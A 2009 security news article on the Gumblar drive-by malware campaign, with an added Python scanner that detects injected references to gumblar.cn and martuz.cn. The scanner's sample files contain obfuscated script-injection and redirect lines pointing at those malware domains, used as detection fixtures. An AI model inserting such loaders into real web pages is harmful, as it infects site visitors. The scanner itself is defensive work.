Gumblar malware attack sweeps web

20 May 2009

A modified version of an attack that tampers with Google search results is spreading rapidly across the web, according to security researchers, who have identified additional malware domains being used in it.

The malware attack, covered in our weekly brief last week, is known by some as Gumblar and by others as JSRedir-R. It installs malware on the victim's machine that locally modifies Google search results, replacing the legitimate results with links to affiliate pages. This is presumably a money-making tool for the customers who pay the malware gang to distribute the attack.

The malware was originally delivered from a server with a Latvian IP address, according to managed security firm ScanSafe. A script inserted into hacked legitimate websites forced visitors' browsers to connect to that server, which delivered a drive-by download to the victim's machine.

Google got wise to the technique and began de-listing sites that had been infected with the script, but the attackers responded with a more complex script, obfuscated to avoid detection. This script pointed to the gumblar.cn domain, which delivered malware that exploited unpatched Adobe Reader and Flash Player installations.

Now a second domain, martuz.cn, has been identified, although the site was down all day yesterday, according to ScanSafe researchers, who mused that the attackers may simply be taking a break while the media attention cools. The number of infected sites pointing to gumblar.cn was nevertheless up 7% overnight.

"This malware may be used by attackers to monitor network traffic and obtain sensitive information, including FTP and login credentials, that can be used to conduct further exploits," said a United States Computer Emergency Readiness Team (US-CERT) advisory on the attack. Stolen FTP credentials would let the attackers inject the script into more sites, spreading the infection further.
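The chain described above (a script injected into legitimate sites that points at gumblar.cn or martuz.cn, with stolen FTP credentials used to seed more sites) is something a site owner can at least check for in their own files. The Python script below is an added example written for this article, not code from ScanSafe, Sophos or US-CERT. The sample files are constructed, and the obfuscation layers it strips (percent-escapes, JavaScript \xNN escapes and string concatenation) are generic assumptions for the example, not a description of the actual Gumblar script.

```python
# Scan web files for injected references to the Gumblar payload domains.
# Added example for this article; the de-obfuscation handled here is generic
# and not a description of the real injected script.
import re
from urllib.parse import unquote

# Domains the article names as hosts of the redirect/exploit payload.
SUSPECT_DOMAINS = ("gumblar.cn", "martuz.cn")

# Constructed sample files standing in for a compromised site's content.
# Each "dirty" file hides the domain behind a different, assumed layer.
SAMPLE_FILES = {
    # plain injected script tag
    "index.html": '<html><body><h1>Welcome</h1>'
                  '<script src="//gumblar.cn/rss/?id=1"></script></body></html>',
    # percent-escaped tag written out through unescape()
    "footer.php": '<script>document.write(unescape("%3Cscript src=%22http://'
                  'mar%74uz.cn/vid/%3F%69d%3D7%22%3E%3C/script%3E"))</script>',
    # domain assembled by string concatenation
    "menu.js": 'var h="gumb"+"lar"+".cn"; var s=document.createElement("script");'
               's.src="http://"+h+"/x.js"; document.body.appendChild(s);',
    # first letter hidden as a JavaScript hex escape (literal backslash-x)
    "side.js": 'var d="\\x67umblar.cn"; location.href="http://"+d+"/";',
    # clean file, must not be flagged
    "about.html": '<html><body><p>Nothing to see here.</p></body></html>',
}

_CONCAT = re.compile(r'(["\'])\s*\+\s*\1')      # "ab" + "cd"  ->  "abcd"
_HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{2})')    # \x74          ->  t


def normalize(text: str, rounds: int = 3) -> str:
    """Peel off common string-obfuscation layers so a plain substring search
    can see the domain. Several rounds, because layers can be nested."""
    for _ in range(rounds):
        before = text
        text = _CONCAT.sub("", text)
        text = _HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
        text = unquote(text)
        if text == before:
            break
    return text.lower()


def find_suspect_domains(text: str) -> list:
    """Return the suspect domains referenced in `text` after de-obfuscation."""
    norm = normalize(text)
    return [d for d in SUSPECT_DOMAINS if d in norm]


def scan_files(files: dict) -> dict:
    """Map each file that references a suspect domain to the domains found.
    Files with no reference are omitted from the result."""
    hits = {}
    for name, content in files.items():
        found = find_suspect_domains(content)
        if found:
            hits[name] = found
    return hits


if __name__ == "__main__":
    for name, domains in scan_files(SAMPLE_FILES).items():
        print(f"{name}: references {', '.join(domains)}")
```

A match is a lead, not a verdict: the check flags any mention of the domains, including a harmless one in page text, so each hit needs a look at the surrounding markup. Since the article notes that FTP credentials are among the data stolen, cleaning the files without also changing those credentials would only invite the script to be re-injected.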

Sophos said the attack was responsible for 42% of drive-by download infections between May 6 and 13.
